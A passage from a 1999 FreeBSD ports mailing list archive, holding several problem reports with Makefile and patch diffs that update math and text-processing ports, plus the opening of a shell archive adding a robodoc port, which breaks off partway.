$FreeBSD: ports/math/linpack/Makefile,v 1.22 1999/09/25 17:57:03 steve Exp $ # @@ -9,17 +9,15 @@ DISTNAME= linpack PKGNAME= linpack-1.0 CATEGORIES= math -MASTER_SITES= ftp://netlib.bell-labs.com/netlib/linpack/ +MASTER_SITES= ftp://ftp.netlib.org/linpack/ \ + ftp://netlib.bell-labs.com/netlib/linpack/ \ + ftp://www.hensa.ac.uk/mirrors/netlib/linpack/ -DIST_SUBDIR= ${DISTNAME} +MAINTAINER= ports@FreeBSD.org LIB_DEPENDS= blas.1:${PORTSDIR}/math/blas -EXTRACT_CMD= ${SH} ${SCRIPTDIR}/uncomp -EXTRACT_SUFX= .gz -EXTRACT_BEFORE_ARGS= ${WRKDIR} -EXTRACT_AFTER_ARGS= # empty - +DIST_SUBDIR= ${DISTNAME} NO_WRKSUBDIR= yes SRCS = cchdc.f cchdd.f cchex.f cchud.f cgbco.f cgbdi.f cgbfa.f cgbsl.f \ @@ -50,11 +48,16 @@ .include +do-extract: +.for file in ${SRCS} + @${GZCAT} ${_DISTDIR}/${file:.f=.f.gz} > ${WRKSRC}/${file} +.endfor + pre-build: - ${CP} ${FILESDIR}/Makefile.lib ${WRKDIR}/Makefile + ${CP} ${FILESDIR}/Makefile.lib ${WRKSRC}/Makefile post-install: - ${LDCONFIG} -m ${PREFIX}/lib + ${SETENV} OBJFORMAT=${PORTOBJFORMAT} ${LDCONFIG} -m ${PREFIX}/lib .if ${PORTOBJFORMAT} == "aout" ${LN} -sf liblinpack.so.1.0 ${PREFIX}/lib/liblinpack.so .endif diff -urN /usr/ports/math/linpack/pkg/DESCR math/linpack/pkg/DESCR --- /usr/ports/math/linpack/pkg/DESCR Mon Oct 31 23:10:50 1994 +++ math/linpack/pkg/DESCR Thu Dec 16 01:47:51 1999 @@ -2,3 +2,5 @@ 1 Feb 84 Used as part of Matlab, and often used to benchmark machines. Otherwise it is a very good linear algebra package. + +WWW: http://www.netlib.org/linpack/ diff -urN /usr/ports/math/linpack/scripts/uncomp math/linpack/scripts/uncomp --- /usr/ports/math/linpack/scripts/uncomp Wed Jul 8 07:41:56 1998 +++ math/linpack/scripts/uncomp Thu Jan 1 09:00:00 1970 @@ -1,6 +0,0 @@ -#!/bin/sh -outdir=$1 -infile=$2 -outfile=`basename $infile .gz` -echo Uncompressing $infile to $outdir/$outfile -gzcat $infile > $outdir/$outfile >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:10:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7DC4C1564D for ; Wed, 15 Dec 1999 12:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98377; Wed, 15 Dec 1999 12:10:05 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 594721560A; Wed, 15 Dec 1999 12:08:57 -0800 (PST) Message-Id: <19991215200857.594721560A@hub.freebsd.org> Date: Wed, 15 Dec 1999 12:08:57 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15502: Update port: math/umfpack to 2.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15502 >Category: ports >Synopsis: Update port: math/umfpack to 2.2.1 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:10:04 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 2.2 to 2.2.1 * Fixed MASTER_SITES * Revised pkg/DESCR >How-To-Repeat: >Fix: diff -urN /usr/ports/math/umfpack/Makefile math/umfpack/Makefile --- /usr/ports/math/umfpack/Makefile Wed Aug 25 19:19:36 1999 +++ math/umfpack/Makefile Thu Dec 16 02:27:54 1999 @@ -1,29 +1,27 @@ # New ports collection makefile for: UMFPACK -# Version required: 2.2 -# Date created: 5 Nov 97 -# Whom: Pedro Giffuni +# Version required: 2.2.1 +# Date created: 5 Nov 97 +# Whom: Pedro Giffuni # # $FreeBSD: ports/math/umfpack/Makefile,v 1.4 1999/08/25 07:16:53 obrien Exp $ # -DISTNAME= umfpack2.2 -PKGNAME= umfpack-2.2 +DISTNAME= UMFPACK2.2.1 +PKGNAME= umfpack-2.2.1 CATEGORIES= math -MASTER_SITES= http://netlib.bell-labs.com/netlib/linalg/ -EXTRACT_SUFX= .tgz +MASTER_SITES= ftp://ftp.cise.ufl.edu/pub/faculty/davis/umfpack/ MAINTAINER= ports@FreeBSD.org -BUILD_DEPENDS= ${PREFIX}/lib/libblas.a:${PORTSDIR}/math/blas +BUILD_DEPENDS= ${LOCALBASE}/lib/libblas.a:${PORTSDIR}/math/blas NO_CDROM= 'Must not be sold' -WRKSRC= ${WRKDIR}/UMFPACK2.2 ALL_TARGET= libumfpack.a do-install: - $(INSTALL_DATA) ${WRKSRC}/libumfpack.a ${PREFIX}/lib + ${INSTALL_DATA} ${WRKSRC}/libumfpack.a ${PREFIX}/lib .if !defined(NOPORTDOCS) - ${MKDIR} ${PREFIX}/share/doc/umfpack + @${MKDIR} ${PREFIX}/share/doc/umfpack ${INSTALL_DATA} ${WRKSRC}/README ${PREFIX}/share/doc/umfpack ${GZIP_CMD} ${PREFIX}/share/doc/umfpack/README .endif diff -urN /usr/ports/math/umfpack/files/md5 math/umfpack/files/md5 --- /usr/ports/math/umfpack/files/md5 Thu Aug 20 19:20:55 1998 +++ math/umfpack/files/md5 Thu Dec 16 02:26:35 1999 @@ -1 +1 @@ -MD5 (umfpack2.2.tgz) = 37bd9386b2f06a48a76559af600969db +MD5 (UMFPACK2.2.1.tar.gz) = b8668f68715929be9c7e30400c1cd6f7 diff -urN /usr/ports/math/umfpack/pkg/DESCR math/umfpack/pkg/DESCR --- /usr/ports/math/umfpack/pkg/DESCR Sun Jul 12 03:20:28 1998 +++ math/umfpack/pkg/DESCR Thu Dec 16 02:30:06 1999 @@ -9,28 +9,4 @@ complex double precision (complex*16) routines are available. (Note that complex*16 is not ANSI Fortran-77, but is a common extension to it). -For more information --------------------- - -For more information, see T. A. Davis and I. S. Duff, "An -unsymmetric-pattern multifrontal method for sparse LU factorization", -SIAM J. Matrix Analysis and Applications (to appear), also -technical report TR-94-038, CISE Dept., Univ. of Florida, -P.O. Box 116120, Gainesville, FL 32611-6120, USA. The method used -here is a modification of that method, described in T. A. Davis, -"A combined unifrontal/multifrontal method for unsymmetric sparse -matrices," TR-94-005, and in T. A. Davis and I. S. Duff, (same title), -TR-95-020. (Technical reports are available via WWW at -http://www.cis.ufl.edu/). The (unsymmetric) approximate degree update -algorithm used here has been incorporated into a symmetric approximate -minimum degree ordering algorithm, described in P. Amestoy, T. A. Davis, -and I. S. Duff, "An approximate minimum degree ordering algorithm", -SIAM Journal on Matrix Analysis and Applications (to appear, also TR-94-039). -The approximate minimum degree ordering algorithm is implemented as MC47 -in the Harwell Subroutine Library (MC47 is not used in UMFPACK). -Also take a look at our World Wide Web home pages: - Tim Davis: http://www.cis.ufl.edu/~davis - (also email: davis@cis.ufl.edu). - Iain Duff: http://www.cis.rl.ac.uk/people/isd/contact.html -______________ - Timothy A. Davis and Iain S. Duff. Copyright (C) 1997. +WWW: http://www.cise.ufl.edu/~davis/umfpack.html >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:10:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 92D751564A for ; Wed, 15 Dec 1999 12:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA98368; Wed, 15 Dec 1999 12:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 318A3155FE; Wed, 15 Dec 1999 12:07:09 -0800 (PST) Message-Id: <19991215200709.318A3155FE@hub.freebsd.org> Date: Wed, 15 Dec 1999 12:07:09 -0800 (PST) From: tkato@prontomail.ne.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15501: Update port: math/superlu to 2.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15501 >Category: ports >Synopsis: Update port: math/superlu to 2.0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:10:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: KATO Tsuguru >Release: 3.3-RELEASE i386 >Organization: >Environment: >Description: * Updated version 1.1 to 2.0 * Fixed MASTER_SITES * Modified patches to supppot CC/CFLAGS properly * Updated WWW: lne of pkg/DESCR * Fixed pkg/PLIST New file: patches/patch-ac >How-To-Repeat: >Fix: diff -urN /usr/ports/math/superlu/Makefile math/superlu/Makefile --- /usr/ports/math/superlu/Makefile Wed Aug 25 19:19:36 1999 +++ math/superlu/Makefile Thu Dec 16 03:56:18 1999 @@ -1,20 +1,19 @@ # New ports collection makefile for: SuperLU -# Version required: 1.1 -# Date created: 31 Oct 97 -# Whom: Pedro Giffuni +# Version required: 2.0 +# Date created: 31 Oct 97 +# Whom: Pedro Giffuni # # $FreeBSD: ports/math/superlu/Makefile,v 1.6 1999/08/25 07:16:08 obrien Exp $ # -DISTNAME= superlu_1.1 -PKGNAME= superlu-1.1 +DISTNAME= superlu_2.0 +PKGNAME= superlu-2.0 CATEGORIES= math -MASTER_SITES= ftp://ftp.cs.berkeley.edu/pub/lapack/SuperLU/ \ - ftp://ftp.u-aizu.ac.jp/pub/SciEng/numanal/cs.berkeley.edu/lapack/SuperLU/ +MASTER_SITES= http://www.nersc.gov/~xiaoye/SuperLU/ MAINTAINER= ports@FreeBSD.org -BUILD_DEPENDS= ${PREFIX}/lib/libblas.a:${PORTSDIR}/math/blas +BUILD_DEPENDS= ${LOCALBASE}/lib/libblas.a:${PORTSDIR}/math/blas WRKSRC= ${WRKDIR}/SuperLU ALL_TARGET= superlulib @@ -22,11 +21,12 @@ # NOTE: The Matlab interface was not built. # -post-install: - $(INSTALL_DATA) ${WRKSRC}/libsuperlu.* ${PREFIX}/lib - $(INSTALL_DATA) ${WRKSRC}/SRC/supermatrix.h ${PREFIX}/include +do-install: + ${INSTALL_DATA} ${WRKSRC}/libsuperlu.* ${PREFIX}/lib + ${INSTALL_DATA} ${WRKSRC}/SRC/supermatrix.h ${PREFIX}/include .if !defined(NOPORTDOCS) - ${MKDIR} ${PREFIX}/share/doc/SuperLU + @${MKDIR} ${PREFIX}/share/doc/SuperLU ${INSTALL_DATA} ${WRKSRC}/INSTALL/*.ps ${PREFIX}/share/doc/SuperLU .endif + .include diff -urN /usr/ports/math/superlu/files/md5 math/superlu/files/md5 --- /usr/ports/math/superlu/files/md5 Mon May 10 07:50:21 1999 +++ math/superlu/files/md5 Thu Dec 16 03:17:00 1999 @@ -1 +1 @@ -MD5 (superlu_1.1.tar.gz) = 476515c112be637339617bc29aecade7 +MD5 (superlu_2.0.tar.gz) = 4a1b1a193bf409b76b663d94f9a2d64d diff -urN /usr/ports/math/superlu/patches/patch-aa math/superlu/patches/patch-aa --- /usr/ports/math/superlu/patches/patch-aa Mon May 10 07:50:23 1999 +++ math/superlu/patches/patch-aa Thu Dec 16 04:00:46 1999 @@ -1,6 +1,6 @@ ---- make.inc.orig Fri Mar 27 07:58:12 1998 -+++ make.inc Mon May 10 01:43:38 1999 -@@ -14,14 +14,14 @@ +--- make.inc.orig Fri Aug 6 15:10:24 1999 ++++ make.inc Thu Dec 16 04:00:37 1999 +@@ -16,14 +16,14 @@ # # The machine (platform) identifier to append to the library names # @@ -14,28 +14,31 @@ -SUPERLULIB = superlu$(PLAT).a -BLASLIB = ../blas$(PLAT).a +SUPERLULIB = libsuperlu$(PLAT).a -+BLASLIB = $(PREFIX)/lib/libblas$(PLAT).a ++BLASLIB = ${LOCALBASE}/lib/libblas$(PLAT).a # # The archiver and the flag(s) to use when building archive (library) -@@ -31,10 +31,10 @@ +@@ -33,12 +33,12 @@ ARCHFLAGS = cr RANLIB = ranlib --CC = cc --CFLAGS = -xO3 -xcg92 --LOADER = cc --LOADOPTS = -xO3 -+CC = gcc -+CFLAGS = -O3 -+LOADER = gcc -+LOADOPTS = -O3 +-CC = gcc ++CC ?= gcc + #CFLAGS = -xO3 -xcg92 +-CFLAGS = -Wall -O2 +-FORTRAN = f77 +-FFLAGS = -O +-LOADER = gcc ++CFLAGS ?= -Wall -O2 ++FORTRAN = ${FC} ++FFLAGS ?= -O ++LOADER = ${CC} + LOADOPTS = #-xO3 # - # C preprocessor defs for compilation (-DNoChange, -DAdd_, or -DUpCase) -@@ -43,4 +43,4 @@ +@@ -48,4 +48,4 @@ # # The directory in which Matlab is installed # -MATLAB = /usr/sww/matlab -+MATLAB = ${PREFIX}/matlab ++MATLAB = ${LOCALBASE}/matlab diff -urN /usr/ports/math/superlu/patches/patch-ab math/superlu/patches/patch-ab --- /usr/ports/math/superlu/patches/patch-ab Mon Aug 10 08:54:16 1998 +++ math/superlu/patches/patch-ab Thu Dec 16 03:32:37 1999 @@ -1,26 +1,14 @@ -*** SRC/util.h.orig Sat Nov 22 22:25:23 1997 ---- SRC/util.h Sat Nov 22 22:29:50 1997 +*** SRC/util.h.orig Fri Aug 6 04:21:40 1999 +--- SRC/util.h Thu Dec 16 03:32:32 1999 *************** -*** 2,10 **** - #define __SUPERLU_UTIL - +*** 4,10 **** +--- 4,12 ---- #include #include -! #include - #include - #include - - /* Macros */ ---- 2,13 ---- - #define __SUPERLU_UTIL - - #include -+ #ifdef __STDC__ - #include -! #else + #include ++ #ifndef __STDC__ #include + #endif -+ #include #include /* Macros */ diff -urN /usr/ports/math/superlu/patches/patch-ac math/superlu/patches/patch-ac --- /usr/ports/math/superlu/patches/patch-ac Thu Jan 1 09:00:00 1970 +++ math/superlu/patches/patch-ac Thu Dec 16 03:29:42 1999 @@ -0,0 +1,14 @@ +*** SRC/sp_coletree.c.orig Fri Aug 6 05:31:22 1999 +--- SRC/sp_coletree.c Thu Dec 16 03:29:12 1999 +*************** +*** 2,8 **** +--- 2,10 ---- + /* Elimination tree computation and layout routines */ + + #include ++ #ifndef __STDC__ + #include ++ #endif + #include + #include "util.h" + diff -urN /usr/ports/math/superlu/pkg/DESCR math/superlu/pkg/DESCR --- /usr/ports/math/superlu/pkg/DESCR Mon May 3 19:38:45 1999 +++ math/superlu/pkg/DESCR Thu Dec 16 03:19:27 1999 @@ -1,6 +1,6 @@ - SuperLU Version 1.0 - =================== + SuperLU (Version 2.0) + ===================== SuperLU contains a set of subroutines to solve a sparse linear system A*X=B. It uses Gaussian elimination with partial pivoting (GEPP). @@ -19,7 +19,7 @@ =================== -WWW: http://www.cs.berkeley.edu/~xiaoye/superlu.html +WWW: http://www.nersc.gov/~xiaoye/SuperLU/ Authors: Jim Demmel demmel@cs.berkeley.edu John Gilbert gilbert@parc.xerox.com diff -urN /usr/ports/math/superlu/pkg/PLIST math/superlu/pkg/PLIST --- /usr/ports/math/superlu/pkg/PLIST Mon Jul 12 19:35:49 1999 +++ math/superlu/pkg/PLIST Thu Dec 16 03:34:43 1999 @@ -1,6 +1,4 @@ include/supermatrix.h lib/libsuperlu.a share/doc/SuperLU/ug.ps -@exec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -m %B -@unexec /usr/bin/env OBJFORMAT=%%PORTOBJFORMAT%% /sbin/ldconfig -R @dirrm share/doc/SuperLU >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:40: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4DE47151E3 for ; Wed, 15 Dec 1999 12:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA01774; Wed, 15 Dec 1999 12:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id 1709D1553B for ; Wed, 15 Dec 1999 12:36:01 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.12 #1) id 11yL9T-000OFb-00 for FreeBSD-gnats-submit@freebsd.org; Wed, 15 Dec 1999 14:35:59 -0600 Message-Id: Date: Wed, 15 Dec 1999 14:35:59 -0600 From: Ade Lovett Reply-To: ade@lovett.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15503: GNOME updates Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15503 >Category: ports >Synopsis: GNOME updates >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ade Lovett >Release: FreeBSD 4.0-CURRENT i386 >Organization: Lovett Network Consultancy >Environment: Up to date ports tree. >Description: More updates to GNOME ports: textproc/libxml 1.7.3 -> 1.8.0 devel/libglade 0.9 -> 0.11 math/gnumeric 0.44 -> 0.45 print/ggv 0.70 -> 0.82 x11-fm/gnomemc 4.5.41 -> 4.5.42 and one update to a related port that I keep forgetting about: misc/mc 4.5.40 -> 4.5.42 >How-To-Repeat: N/A >Fix: Tarball containing 6 diffs can be found at: http://www.lovett.com/FreeBSD/gnome19991215.tar.gz >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:40:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 33BB414C24 for ; Wed, 15 Dec 1999 12:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA01783; Wed, 15 Dec 1999 12:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id 40EC915498 for ; Wed, 15 Dec 1999 12:37:59 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.12 #1) id 11yLBO-000OHU-00 for FreeBSD-gnats-submit@freebsd.org; Wed, 15 Dec 1999 14:37:58 -0600 Message-Id: Date: Wed, 15 Dec 1999 14:37:58 -0600 From: Ade Lovett Reply-To: ade@lovett.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15504: Update textproc/aspell Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15504 >Category: ports >Synopsis: Update textproc/aspell >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ade Lovett >Release: FreeBSD 4.0-CURRENT i386 >Organization: Lovett Network Consultancy >Environment: Up to date ports tree. >Description: Update textproc/aspell from 0.28.2.1 -> 0.28.3 >How-To-Repeat: N/A >Fix: Apply following diff: Version: 0.28.2.1 -> 0.28.3 Changes: Makefile files/md5 Adds: NONE Removes: NONE cvs diff: Diffing . Index: Makefile =================================================================== RCS file: /home/ncvs/ports/textproc/aspell/Makefile,v retrieving revision 1.10 diff -u -r1.10 Makefile --- Makefile 1999/08/31 02:08:57 1.10 +++ Makefile 1999/12/07 21:50:54 @@ -1,13 +1,13 @@ # New ports collection makefile for: aspell -# Version required: 0.28.2.1 +# Version required: 0.28.3 # Date created: 7 December 1998 # Whom: Josh Gilliam # # $FreeBSD: ports/textproc/aspell/Makefile,v 1.10 1999/08/31 02:08:57 peter Exp $ # -DISTNAME= aspell-.28.2.1 -PKGNAME= aspell-0.28.2.1 +DISTNAME= aspell-.28.3 +PKGNAME= aspell-0.28.3 CATEGORIES= textproc MASTER_SITES= http://metalab.unc.edu/kevina/aspell/ \ ftp://ftp.kddlabs.co.jp/pub/Tools/aspell/ \ @@ -15,13 +15,7 @@ MAINTAINER= ade@lovett.com -# As and when gcc-2.95.1 becomes the 4.x system compiler, we can -# remove this and uncomment USE_NEWGCC -BUILD_DEPENDS= g++295:${PORTSDIR}/lang/egcs - -CC= gcc295 -CXX= g++295 -#USE_NEWGCC= yes +USE_NEWGCC= yes USE_LIBTOOL= yes CONFIGURE_ENV= CXXFLAGS="${CXXFLAGS} -I${WRKSRC}" USE_GMAKE= yes cvs diff: Diffing files Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/textproc/aspell/files/md5,v retrieving revision 1.5 diff -u -r1.5 md5 --- md5 1999/08/26 20:48:26 1.5 +++ md5 1999/12/07 21:52:58 @@ -1 +1 @@ -MD5 (aspell-.28.2.1.tar.gz) = a024a7c6bca99584cdae63abe41af3ad +MD5 (aspell-.28.3.tar.gz) = 928a2a82950bddf7e926db2edb91b59d cvs diff: Diffing patches cvs diff: Diffing pkg >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:50: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7353D1561E for ; Wed, 15 Dec 1999 12:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA02703; Wed, 15 Dec 1999 12:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id 14C56152E3 for ; Wed, 15 Dec 1999 12:40:45 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.12 #1) id 11yLE1-000OJT-00 for FreeBSD-gnats-submit@freebsd.org; Wed, 15 Dec 1999 14:40:41 -0600 Message-Id: Date: Wed, 15 Dec 1999 14:40:41 -0600 From: Ade Lovett Reply-To: ade@lovett.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15505: Update math/gnuplot Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15505 >Category: ports >Synopsis: Update math/gnuplot >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ade Lovett >Release: FreeBSD 4.0-CURRENT i386 >Organization: Lovett Network Consultancy >Environment: Up to date ports tree. >Description: Update math/gnuplot to 3.7.1 and fix gd/png dependencies. This requires graphics/gd to be updated as per PR 15313 >How-To-Repeat: N/A >Fix: Apply following diff: Version: 3.7 -> 3.7.1 and fix gd/png dependencies Changes: Makefile files/md5 Adds: NONE Removes: NONE cvs diff: Diffing . Index: Makefile =================================================================== RCS file: /home/ncvs/ports/math/gnuplot/Makefile,v retrieving revision 1.26 diff -u -r1.26 Makefile --- Makefile 1999/09/10 23:40:04 1.26 +++ Makefile 1999/12/10 16:24:56 @@ -1,34 +1,28 @@ # New ports collection makefile for: gnuplot -# Version required: 3.7 +# Version required: 3.7.1 # Date created: 19 April 1998 # Whom: chuckr # # $FreeBSD: ports/math/gnuplot/Makefile,v 1.26 1999/09/10 23:40:04 chuckr Exp $ # -DISTNAME= gnuplot-3.7 +DISTNAME= gnuplot-3.7.1 CATEGORIES= math graphics MASTER_SITES= ftp://ftp.gnuplot.vt.edu/pub/gnuplot/ MAINTAINER= chuckr@FreeBSD.org -LIB_DEPENDS= png.3:${PORTSDIR}/graphics/png -BUILD_DEPENDS= ${LOCALBASE}/lib/libgd.a:${PORTSDIR}/graphics/gd +LIB_DEPENDS= gd.0:${PORTSDIR}/graphics/gd USE_XLIB= yes GNU_CONFIGURE= yes +CONFIGURE_ENV= CPPFLAGS="-I${LOCALBASE}/include -I${LOCALBASE}/include/gd" CONFIGURE_ARGS= --exec-prefix=${PREFIX} \ --includedir=${LOCALBASE}/include/ \ --libdir=${LOCALBASE}/lib \ --with-x --without-linux-vga \ --with-gd=${LOCALBASE}/lib \ --with-gnu-readline --with-lasergnu --with-png - -pre-configure: - $(SED) -e "s%@CPPFLAGS@%-I$(LOCALBASE)/include -I$(X11BASE)/include%" \ - < $(WRKSRC)/Makefile.in > $(WRKDIR)/tmp-makefile.in - $(CP) $(WRKDIR)/tmp-makefile.in $(WRKSRC)/Makefile.in - MAN1= gnuplot.1 lasergnu.1 cvs diff: Diffing files Index: files/md5 =================================================================== RCS file: /home/ncvs/ports/math/gnuplot/files/md5,v retrieving revision 1.5 diff -u -r1.5 md5 --- md5 1999/02/10 04:10:05 1.5 +++ md5 1999/12/10 16:27:26 @@ -1 +1 @@ -MD5 (gnuplot-3.7.tar.gz) = 18bbd384a991e7b20dbd2c29c239e90d +MD5 (gnuplot-3.7.1.tar.gz) = 30798b4c14ea734969a86ee41a9c1dca cvs diff: Diffing patches cvs diff: Diffing pkg >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 12:50:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 87A9715621 for ; Wed, 15 Dec 1999 12:50:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA02721; Wed, 15 Dec 1999 12:50:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id 2A10D154B2 for ; Wed, 15 Dec 1999 12:42:57 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from root@localhost) by blackdawn.com (8.9.3/8.9.3) id PAA28566; Wed, 15 Dec 1999 15:42:54 -0500 (EST) (envelope-from will) Message-Id: <199912152042.PAA28566@blackdawn.com> Date: Wed, 15 Dec 1999 15:42:54 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15507: new port: devel/robodoc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15507 >Category: ports >Synopsis: new port: devel/robodoc >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Dec 15 12:50:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Nov 30 10:14:31 EST 1999 root@argon.blackdawn.com:/usr/src/sys/compile/ARGON i386 >Description: Robodoc is a cxref-like program that outputs links in code to assist programmers in evaluating design, among other things. See DESCR. >How-To-Repeat: Use the shar below to add the port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # robodoc # robodoc/files # robodoc/files/md5 # robodoc/pkg # robodoc/pkg/COMMENT # robodoc/pkg/DESCR # robodoc/pkg/PLIST # robodoc/Makefile # echo c - robodoc mkdir -p robodoc > /dev/null 2>&1 echo c - robodoc/files mkdir -p robodoc/files > /dev/null 2>&1 echo x - robodoc/files/md5 sed 's/^X//' >robodoc/files/md5 << 'END-of-robodoc/files/md5' XMD5 (robodoc.tgz) = b5d871b4346513976da644132e00234a END-of-robodoc/files/md5 echo c - robodoc/pkg mkdir -p robodoc/pkg > /dev/null 2>&1 echo x - robodoc/pkg/COMMENT sed 's/^X//' >robodoc/pkg/COMMENT << 'END-of-robodoc/pkg/COMMENT' XCode reference program similar to cxref that produces HTML. END-of-robodoc/pkg/COMMENT echo x - robodoc/pkg/DESCR sed 's/^X//' >robodoc/pkg/DESCR << 'END-of-robodoc/pkg/DESCR' XA documentation tool for C, C++, Java, Assembler, Basic, XFortran, 